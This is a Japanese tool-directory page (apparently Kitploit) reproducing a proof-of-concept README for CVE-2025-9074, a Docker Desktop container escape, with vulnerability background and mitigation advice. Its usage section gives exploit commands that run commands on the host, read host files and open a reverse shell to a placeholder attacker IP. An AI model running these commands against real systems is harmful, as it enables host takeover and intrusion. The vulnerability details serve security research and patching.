Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — CVE-2025-9074 の概念実証エクスプロイト - Windows および macOS 上の Docker Desktop < 4.44.3 に影響する認証不要の Docker Engine API コンテナエスケープ (CVSS 9.3) | Kitploit
ツール/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
コンテナセキュリティ脆弱性分析エクスプロイトペネトレーションテストクラウドセキュリティレッドチーミングコンテナエスケープ
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

CVE-2025-9074-Docker-Desktop-Container-Escape

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-9074 の概念実証エクスプロイト - Windows および macOS 上の Docker Desktop < 4.44.3 に影響する認証不要の Docker Engine API コンテナエスケープ (CVSS 9.3)

リポジトリを見る
28ヶ月前未レビュー

CVE-2025-9074: Docker Desktop コンテナエスケープ PoC

CVE CVSS Platform

CVE-2025-9074 の概念実証エクスプロイト - Docker Desktop における重大なコンテナエスケープ脆弱性で、Docker Engine API への認証不要のアクセスを可能にします。

脆弱性概要

プロパティ値
CVE IDCVE-2025-9074
CVSS スコア9.3 (Critical)
影響を受けるソフトウェアDocker Desktop < 4.44.3
影響を受けるプラットフォームWindows、macOS(Linuxは影響なし)
修正バージョンDocker Desktop 4.44.3+
発見者Felix Boulet, Philippe Dugré
発見日2025年半ば
パッチ日2025年8月20日

技術的詳細

この脆弱性により、Docker Desktop上で実行されているコンテナが、http://192.168.65.7:2375 のDocker Engine APIに認証なしでアクセスできるようになります。これは以下に関係なく発生します:

  • 拡張コンテナ分離(ECI)設定
  • "Expose daemon on tcp://localhost:2375 without TLS" 設定
  • その他のセキュリティ設定

影響

  • Windows (WSLバックエンド):管理権限による完全なホスト乗っ取り
  • macOS:コンテナ操作と潜在的なバックドア(ユーザープロンプトによる制限あり)
  • Linux:影響を受けない(TCPではなくUnixソケットを使用)

根本原因

Docker Engine APIがコンテナ内からアクセス可能なTCPソケット上に公開され、以下を許可していました:

  • コンテナの作成/削除
  • ホストファイルシステムのマウント
  • 特権コマンドの実行
  • コンテナ分離の完全なバイパス

使用方法

image

前提条件

root@kitploit:~
pip3 install requests

コマンド実行モード

root@kitploit:~
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"

# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

リバースシェルモード

root@kitploit:~
# Terminal 1: Set up listener
nc -lvnp 4444

# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444

# Once connected, host filesystem is at: /hostfs

コンテナ内部から

root@kitploit:~
# If you already have access to a container
curl http://192.168.65.7:2375/version

攻撃シナリオ

root@kitploit:~
graph TD
    A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
    B -->|Create Container| C[Privileged Container]
    C -->|Mount Host FS| D[Full Host Access]
    D -->|Read/Write| E[Compromise System]

緩和策

即時対応が必要

直ちにDocker Desktop 4.44.3以降にアップデートしてください。

root@kitploit:~
# Check your Docker Desktop version
docker --version

# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg

回避策(一時的)

即時アップデートが不可能な場合:

  1. 信頼できないコンテナの実行を避ける
  2. コンテナからのネットワーク接続を監視する
  3. ネットワークセグメンテーションを実装する
  4. デプロイ前にすべてのコンテナイメージを確認する

参考資料

  • Docker セキュリティアドバイザリ
  • NVD CVE-2025-9074
  • Felix Boulet のブログ
  • Philippe Dugré の分析
  • GitHub アドバイザリ

免責事項

このツールは教育および許可されたセキュリティテスト目的のみで提供されます。

  • 所有しているか、テストする明示的な許可があるシステムに対してのみ使用してください
  • コンピュータシステムへの不正アクセスは違法です
  • 作成者は本ソフトウェアの誤用に対する一切の責任を負いません

謝辞

  • 脆弱性発見: Felix Boulet, Philippe Dugré
  • PoC開発: Amanja Francisco
  • Dockerセキュリティチーム: 迅速な対応とパッチに感謝

ライセンス

MITライセンス - 詳細はLICENSEファイルを参照

ツールをダウンロード